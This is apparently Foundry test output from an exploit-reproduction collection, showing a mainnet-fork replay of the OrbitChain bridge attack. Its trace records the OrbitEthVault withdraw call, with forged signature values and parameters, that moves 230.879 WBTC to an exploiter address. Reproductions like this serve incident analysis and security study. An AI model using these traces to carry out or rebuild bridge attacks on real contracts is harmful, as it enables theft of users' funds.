Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 970.02ms (1.94ms CPU time)

Ran 1 test for src/test/2024-01/OrbitChain_exp.sol:ContractTest
[PASS] testExploit() (gas: 358465)
Logs:
  Exploiter WBTC balance before attack: 0.00000000
  Exploiter WBTC balance after attack: 230.87900000

Traces:
  [5821] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18908049 [1.89e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], "WBTC")
    │   └─ ← [Return]
    ├─ [0] VM::label(OrbitEthVault: [0x1Bf68A9d1EaEe7826b3593C20a0ca93293cb489a], "OrbitEthVault")
    │   └─ ← [Return]
    ├─ [0] VM::label(orbitHubContractAddress: [0xB5680a55d627c52DE992e3EA52a86f19DA475399], "orbitHubContractAddress")
    │   └─ ← [Return]
    └─ ← [Stop]

  [433265] ContractTest::testExploit()
    ├─ [2795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 1208790 [1.208e6]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 1208790 [1.208e6]
    ├─ [0] VM::accesses(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599])
    │   └─ ← [Return] [0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5], []
    ├─ [0] VM::load(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5) [staticcall]
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000001271d6
    ├─ [0] VM::load(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5) [staticcall]
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000001271d6
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 1208790 [1.208e6]
    ├─ [0] VM::store(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5, 0x00000000000000000000000000000000000000000000000000000000001271d6)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], fsig: 0x70a08231, keysHash: 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5, slot: 25723635473730643076743183701669883887735574088642001433147103629615491512501 [2.572e76])
    ├─ [0] VM::load(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5) [staticcall]
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000001271d6
    ├─ [0] VM::store(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 0
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2431] WBTC::decimals() [staticcall]
    │   └─ ← [Return] 8
    ├─ emit log_named_decimal_uint(key: "Exploiter WBTC balance before attack", val: 0, decimals: 8)
    ├─ [1110] OrbitEthVault::chain() [staticcall]
    │   └─ ← [Return] "ETH"
    ├─ [84] PRECOMPILES::sha256(0xb5680a55d627c52de992e3ea52a86f19da4753994554481bf68a9d1eaee7826b3593c20a0ca93293cb489a) [staticcall]
    │   └─ ← [Return] 0x50f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060
    ├─ [431] WBTC::decimals() [staticcall]
    │   └─ ← [Return] 8
    ├─ [128955] OrbitEthVault::withdraw(orbitHubContractAddress: [0xB5680a55d627c52DE992e3EA52a86f19DA475399], "ORBIT", 0x9263e7873613ddc598a701709875634819176aff, 0x9ca536d01B9E78dD30de9d7457867F8898634049, WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], [0x50f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060, 0xf7f60c98b04d45c371bcccf6aa12ebcd844fca6b17e7cd77503d6159d60a1aaa], [23087900000 [2.308e10], 8, 8735], 0x, [27, 28, 28, 27, 28, 28, 27], [0x3ef06a27b3565a82b6d72af184ca3d787e3dd8fc0bd56bb0e7dce2faf920257d, 0xf1d81597f32c9376e90d22b9a1f121f1a99a1c191f8e930ed0de6df7b759a154, 0x3b7169e2ee2b73dcfbabae1400b811b95616cb5dc547b8b7b7c6aeb37b5b906b, 0xd4b7fd0617b28e1eeb018e1dbf924e662d1a0520cad96af2fcf496e16f4c58c6, 0xe06c17f1a6630bfa47f0fe0cfba02f40f0901e2412713e4c7f46ae17a25dc92c, 0xdecb2622da70fee1c343b93dc946eb855fd32c59b293c0765cb94a71e62aeff3, 0xff7c705149017ce467d05717eadb0a2718aedc7a1799ad153d05e8fc48be853e], [0x0cc266abfa2ba924ffa7dab0cd8f7bb1a14891ec74dea53927c09296d1c6ac7c, 0x739fe72bab59a2eead1e36fdf71441e0407332c508165e460a2cde5418858e1b, 0x18303ee09818b0575ea4a5c2ed25b1e78523aa2b387a9c7c9c23b0d906ff9e07, 0x37da521031f0a65dd8466d4def41c44a69796f696965c42f9705447286c0ac9a, 0x5443cf63033ab211f205076622b2426b994ce3706c1ee2464a68ef168c7639bb, 0x725fa18d06acb4f6f8a5b143bca088d76f77d9531765dea6799b484373d0641b, 0x6b6ddbaaafc5f0580b670ad9d0913ca4c60df2753151a499117086aa725cf2c7])
    │   ├─ [123008] 0xC3430BC8C2C05FC6b42114BF7F82a3e2f3Ee9454::withdraw(orbitHubContractAddress: [0xB5680a55d627c52DE992e3EA52a86f19DA475399], "ORBIT", 0x9263e7873613ddc598a701709875634819176aff, 0x9ca536d01B9E78dD30de9d7457867F8898634049, WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], [0x50f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060, 0xf7f60c98b04d45c371bcccf6aa12ebcd844fca6b17e7cd77503d6159d60a1aaa], [23087900000 [2.308e10], 8, 8735], 0x, [27, 28, 28, 27, 28, 28, 27], [0x3ef06a27b3565a82b6d72af184ca3d787e3dd8fc0bd56bb0e7dce2faf920257d, 0xf1d81597f32c9376e90d22b9a1f121f1a99a1c191f8e930ed0de6df7b759a154, 0x3b7169e2ee2b73dcfbabae1400b811b95616cb5dc547b8b7b7c6aeb37b5b906b, 0xd4b7fd0617b28e1eeb018e1dbf924e662d1a0520cad96af2fcf496e16f4c58c6, 0xe06c17f1a6630bfa47f0fe0cfba02f40f0901e2412713e4c7f46ae17a25dc92c, 0xdecb2622da70fee1c343b93dc946eb855fd32c59b293c0765cb94a71e62aeff3, 0xff7c705149017ce467d05717eadb0a2718aedc7a1799ad153d05e8fc48be853e], [0x0cc266abfa2ba924ffa7dab0cd8f7bb1a14891ec74dea53927c09296d1c6ac7c, 0x739fe72bab59a2eead1e36fdf71441e0407332c508165e460a2cde5418858e1b, 0x18303ee09818b0575ea4a5c2ed25b1e78523aa2b387a9c7c9c23b0d906ff9e07, 0x37da521031f0a65dd8466d4def41c44a69796f696965c42f9705447286c0ac9a, 0x5443cf63033ab211f205076622b2426b994ce3706c1ee2464a68ef168c7639bb, 0x725fa18d06acb4f6f8a5b143bca088d76f77d9531765dea6799b484373d0641b, 0x6b6ddbaaafc5f0580b670ad9d0913ca4c60df2753151a499117086aa725cf2c7]) [delegatecall]
    │   │   ├─ [72] PRECOMPILES::sha256(0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a4f52424954) [staticcall]
    │   │   │   └─ ← [Return] 0xb18557931ff79edd3f4f9f4679b4538562f57b62aadb370d1b78a81df9dd56bb
    │   │   ├─ [72] PRECOMPILES::sha256(0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a4f52424954) [staticcall]
    │   │   │   └─ ← [Return] 0xb18557931ff79edd3f4f9f4679b4538562f57b62aadb370d1b78a81df9dd56bb
    │   │   ├─ [84] PRECOMPILES::sha256(0xb5680a55d627c52de992e3ea52a86f19da4753994554481bf68a9d1eaee7826b3593c20a0ca93293cb489a) [staticcall]
    │   │   │   └─ ← [Return] 0x50f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060
    │   │   ├─ [72] PRECOMPILES::sha256(0x1bf68a9d1eaee7826b3593c20a0ca93293cb489a4f52424954) [staticcall]
    │   │   │   └─ ← [Return] 0xb18557931ff79edd3f4f9f4679b4538562f57b62aadb370d1b78a81df9dd56bb
    │   │   ├─ [156] PRECOMPILES::sha256(0xb5680a55d627c52de992e3ea52a86f19da4753994f524249544554489263e7873613ddc598a701709875634819176aff9ca536d01b9e78dd30de9d7457867f88986340492260fac5e5542a773aa44fbcfedf7c193bc2c59950f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060f7f60c98b04d45c371bcccf6aa12ebcd844fca6b17e7cd77503d6159d60a1aaa00000000000000000000000000000000000000000000000000000005602565600000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000221f) [staticcall]
    │   │   │   └─ ← [Return] 0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 27, 28468172563146432138467096657209299556338359152284195833463470884987896604029, 5771231128190489836589073804115472419125633980303676192752229758456906034300) [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000a6dc28cbcb2f8060a00b4fa67f9b67775ac5a3a1
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 28, 109389184507793784346642101993032143682288471935559220549526618978131012854100, 52298501751104489252930331723237095356268387493578285021930848892690121461275) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000008a3f117ef3b40f1661dedf7f28fc33e7b6fae4f8
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 28, 26886842586129234904627543049498536424186742458186371306350579007483803308139, 10940750988426934955966816651611706121252247659005276951033375137250846678535) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000001c0cd56f1c3e2cf13b9b44dbe5529104bade543e
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 27, 96215403218587972723455803151950228964595399632793711617415405244830442084550, 25262945712020222551010227077216559313821852464398054328117540875424130706586) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007f4b332611818ae13c76f9222e2229f274ded9bd
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 28, 101509062820683445371623020482972225365581428950116190157647733198239083383084, 38114089365203116906762390111942525214225787622632232665356418211987835992507) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000003924ac70075078a7713f543b72e3f8817ecec646
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 28, 100772385545639078253078513928730447459722328266515881443817793584114432667635, 51732630192863549379967316560348799606099154370827233738976852019377142260763) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000003b6590ff12ba188e465395e1610d8368613054b0
    │   │   ├─ [3000] PRECOMPILES::ecrecover(0x8df324c6d9450793ff2e0e75391e0b3117f55bfdd6d377974e6797ffbf7b763d, 27, 115559640611800378636398202191588610079896249021745910022620806591280662349118, 48591577212622306356189218529280706368723866238728040751254479990503451194055) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000067c3c784c49d9ab8757adb71491df1a1b38fbfa8
    │   │   ├─ emit Withdraw(: "ORBIT", : 0x9263e7873613ddc598a701709875634819176aff, : 0x9ca536d01b9e78dd30de9d7457867f8898634049, : 0x2260fac5e5542a773aa44fbcfedf7c193bc2c599, : [0x50f408f4b0fb17bf4f5143de4bd95802410d00422f008e9deef06fb101a0f060, 0xf7f60c98b04d45c371bcccf6aa12ebcd844fca6b17e7cd77503d6159d60a1aaa], : [23087900000 [2.308e10], 8, 8735], : 0x)
    │   │   ├─ [2795] WBTC::balanceOf(OrbitEthVault: [0x1Bf68A9d1EaEe7826b3593C20a0ca93293cb489a]) [staticcall]
    │   │   │   └─ ← [Return] 28760310355 [2.876e10]
    │   │   ├─ [6903] WBTC::transfer(0x9ca536d01B9E78dD30de9d7457867F8898634049, 23087900000 [2.308e10])
    │   │   │   ├─ emit Transfer(from: OrbitEthVault: [0x1Bf68A9d1EaEe7826b3593C20a0ca93293cb489a], to: 0x9ca536d01B9E78dD30de9d7457867F8898634049, value: 23087900000 [2.308e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5: 0 → 0x0000000000000000000000000000000000000000000000000000000560256560
    │   │   │   │   @ 0xa0bbaafc831a29fc05ab0d59f55cc902786a1f97d1af8abacd98807f17e6f558: 0x00000000000000000000000000000000000000000000000000000006b23f8253 → 0x00000000000000000000000000000000000000000000000000000001521a1cf3
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xcefb184f3ae3d818b4a9906bbb0c8c5ec042694476dfdbcce9be7cf21e4625de: 0 → 1
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [795] WBTC::balanceOf(0x9ca536d01B9E78dD30de9d7457867F8898634049) [staticcall]
    │   └─ ← [Return] 23087900000 [2.308e10]
    ├─ [431] WBTC::decimals() [staticcall]
    │   └─ ← [Return] 8
    ├─ emit log_named_decimal_uint(key: "Exploiter WBTC balance after attack", val: 23087900000 [2.308e10], decimals: 8)
    ├─  storage changes:
    │   @ 0x4a5c72c687cb496b3f3d13c70cebaa0cb6d65ece353252354ff8d64587a43803: 0 → 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5
    │   @ 0x38df0fcd2c0a0df108cfe8a6ae4850ca1cdfd082e4b6cb9f9fdf3e7a2fa0f8b5: 0x00000000000000000000000000000000000000000000000000000000001271d6 → 0
    │   @ 0x4a5c72c687cb496b3f3d13c70cebaa0cb6d65ece353252354ff8d64587a43806: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.52s (11.19s CPU time)

Ran 2 test suites in 14.56s (14.49s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
